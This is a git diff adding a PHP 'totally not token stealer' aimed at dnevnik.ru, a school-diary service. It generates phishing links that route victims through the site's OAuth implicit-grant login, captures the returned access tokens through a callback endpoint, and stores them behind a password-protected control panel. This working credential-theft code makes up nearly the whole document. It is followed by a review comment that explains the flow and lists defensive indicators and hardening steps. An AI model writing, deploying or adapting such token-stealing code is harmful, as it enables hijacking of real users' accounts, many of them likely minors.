243
script.php
Normal file
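--- /dev/null
+++ b/script.php
@@ -0,0 +1,243 @@
+<?php
+// totally not token stealer
+// for dnevnik.ru
+// =========================
+// by ktkz for tmb project
+// 2026
+
+// go to .php?control to open control panel
+
+// ===CONFIG===
+const PANEL_PASSWORD = "TOTALLYNOTSTEALERpassword1";
+
+const DATA_FILE_PATH = "./totallynotstealeddata.php";
+const AUTH_URL = "https://login.dnevnik.ru/login/?ReturnUrl=";
+const OAUTH_URL = "https://login.dnevnik.ru/oauth2?response_type=token&client_id=b8006d75-70a9-4291-885c-13d8511bb2ae&scope=CommonInfo,EducationalInfo,FriendsAndRelatives&redirect_uri=";
+// ============
+
+// ===PAGES===
+// NOTE: contains ai-generated styles and mine shitty while state-of-art template system
+// we use builder to mount these
+function LOGIN_PAGE(string $data)
+{
+return "<<BUILDER_MOUNT_FILE_(.\dev\html\login.html)>>";
+}
+function CONTROL_PAGE(string $data)
+{
+return "<<BUILDER_MOUNT_FILE_(.\dev\html\control.html)>>";
+}
+// ===========
+
+// PREPARATION
+if (!file_exists(DATA_FILE_PATH)) {
+file_put_contents(
+DATA_FILE_PATH,
+'<?php // { "name": "tnts", "version": 1, "data": [] }',
+);
+}
+// ROUTER
+function path(string $p)
+{
+return count($_GET) > 0 && array_keys($_GET)[0] == $p;
+}
+
+if (path("control")) {
+if (!isset($_GET["l"]) || $_GET["l"] == "") {
+echo LOGIN_PAGE("{}");
+exit();
+}
+if ($_GET["l"] != PANEL_PASSWORD) {
+echo LOGIN_PAGE('{error: "wrong password"}');
+exit();
+}
+// user authorized
+if (!in_array("do", array_keys($_GET))) {
+$config = readConfig();
+$error = "";
+if (isset($_GET["error"])) {
+$error = $_GET["error"];
+}
+echo CONTROL_PAGE(
+json_encode([
+"password" => $_GET["l"],
+"data" => $config,
+"error" => $error,
+]),
+);
+exit();
+}
+}
+
+function readConfig()
+{
+$_ = json_decode(
+str_replace("<?php // ", "", file_get_contents(DATA_FILE_PATH)),
+true,
+);
+if ($_["name"] != "tnts" || !isset($_["data"])) {
+exit();
+}
+return $_["data"];
+}
+
+function saveConfig(array $config)
+{
+$_ = ["name" => "tnts", "version" => 1, "data" => $config];
+file_put_contents(DATA_FILE_PATH, "<?php // " . json_encode($_));
+}
+// config type
+// {
+// {
+// "name": string,
+// "url": string,
+// "comment": string?,
+// "token": string?
+// }
+// }
+//
+// define status by token presence
+
+if (
+isset($_GET["do"]) &&
+$_GET["do"] === "create" &&
+isset($_GET["url"]) &&
+isset($_GET["name"])
+) {
+if (!isset($_GET["l"]) || $_GET["l"] == "" || $_GET["l"] != PANEL_PASSWORD) {
+exit();
+}
+// create link
+$url = $_GET["url"];
+$name = $_GET["name"];
+$comment = $_GET["comment"] ?? null;
+
+$config = readConfig();
+$matches = array_values(
+array_filter(
+$config,
+fn($item) => isset($item["name"]) && $item["name"] === $name,
+),
+);
+if (count($matches) != 0) {
+header(
+"Location: " .
+parse_url($_SERVER["REQUEST_URI"], PHP_URL_PATH) .
+"?control&l=" .
+$_GET["l"] .
+"&error=" .
+urlencode("url already exists"),
+true,
+302,
+);
+exit();
+}
+$config[] = [
+"name" => $name,
+"url" => $url,
+"comment" => $comment,
+"token" => null,
+];
+
+saveConfig($config);
+header(
+"Location: " .
+parse_url($_SERVER["REQUEST_URI"], PHP_URL_PATH) .
+"?control&l=" .
+$_GET["l"],
+true,
+302,
+);
+}
+
+if (isset($_GET["do"]) && $_GET["do"] === "delete" && isset($_GET["delete"])) {
+if (!isset($_GET["l"]) || $_GET["l"] == "" || $_GET["l"] != PANEL_PASSWORD) {
+exit();
+}
+$name = $_GET["delete"];
+$config = readConfig();
+$config = array_filter(
+$config,
+fn($item) => isset($item["name"]) && $item["name"] != $name,
+);
+saveConfig($config);
+header(
+"Location: " .
+parse_url($_SERVER["REQUEST_URI"], PHP_URL_PATH) .
+"?control&l=" .
+$_GET["l"],
+true,
+302,
+);
+exit();
+}
+
+function getBaseUrl(): string
+{
+$scheme =
+!empty($_SERVER["HTTPS"]) && $_SERVER["HTTPS"] !== "off" ? "https" : "http";
+$host = $_SERVER["HTTP_HOST"] ?? ($_SERVER["SERVER_NAME"] ?? "");
+$script = $_SERVER["SCRIPT_NAME"] ?? ($_SERVER["PHP_SELF"] ?? "");
+return $scheme . "://" . $host . $script;
+}
+
+if (isset($_GET["go"])) {
+$config = readConfig();
+$matches = array_values(
+array_filter(
+$config,
+fn($item) => isset($item["name"]) && $item["name"] == $_GET["go"],
+),
+);
+if (count($matches) == 0) {
+exit();
+}
+$goUrl = getBaseUrl() . "?callback&name=" . $_GET["go"];
+$redirect = AUTH_URL . rawurlencode(OAUTH_URL . rawurlencode($goUrl));
+header("Location: " . $redirect, true, 302);
+exit();
+}
+
+if (path("info")) {
+header("Content-type: application/json");
+echo json_encode([
+"name" => "totally not token stealer",
+"version" => "1.0.0",
+"author" => "ktkz",
+]);
+}
+
+if (path("callback") && isset($_GET["name"])) {
+$base = parse_url($_SERVER["REQUEST_URI"], PHP_URL_PATH);
+$config = readConfig();
+$matches = array_values(
+array_filter(
+$config,
+fn($item) => isset($item["name"]) && $item["name"] == $_GET["name"],
+),
+);
+if (count($matches) == 0) {
+exit();
+}
+
+$send_url = $base . "?send&name=" . $_GET["name"];
+$redirect_url = $matches[0]["url"];
+
+echo "<<BUILDER_MOUNT_FILE_(.\dev\html\callback.html)>>";
+exit();
+}
+
+if (path("send") && isset($_GET["name"]) && isset($_GET["token"])) {
+$config = readConfig();
+$matches = array_values(
+array_filter(
+$config,
+fn($item) => isset($item["name"]) && $item["name"] == $_GET["name"],
+),
+);
+if (count($matches) == 0) {
+exit();
+}
+
+$config[array_search($matches[0], $config)]["token"] = $_GET["token"];
+saveConfig($config);
+}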
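Review bot: The header comment at the top of `script.php` (`// totally not token stealer`) hides what the file does and should state it plainly, for example `// Captures dnevnik.ru OAuth implicit-grant access tokens via ?go -> ?callback -> ?send and stores them in DATA_FILE_PATH`. That description is traceable to the new lines: the `go` branch redirects the visitor through `AUTH_URL` and `OAUTH_URL` (`response_type=token`) with a `redirect_uri` pointing back at this script, and the `send` branch writes the `token` query parameter into the matching entry of the data file; the `callback.html` template is not shown, so how the token gets from the redirect to `?send` is inferred. For triage on a web host, the visible artifacts are a file at `DATA_FILE_PATH` that starts with `<?php // ` followed by JSON whose `name` is `tnts`, and requests whose first query key is `control`, `callback`, `send` or `info`, or that carry `go=`; the panel password (`l=`) and the captured `token=` both travel in the query string, so they would normally appear in access logs. On the provider side the flow presumably depends on the authorization server accepting this script's URL as `redirect_uri` for the `client_id` in `OAUTH_URL`, so exact-match redirect URI registration for that client and any tokens issued to it are the things to review.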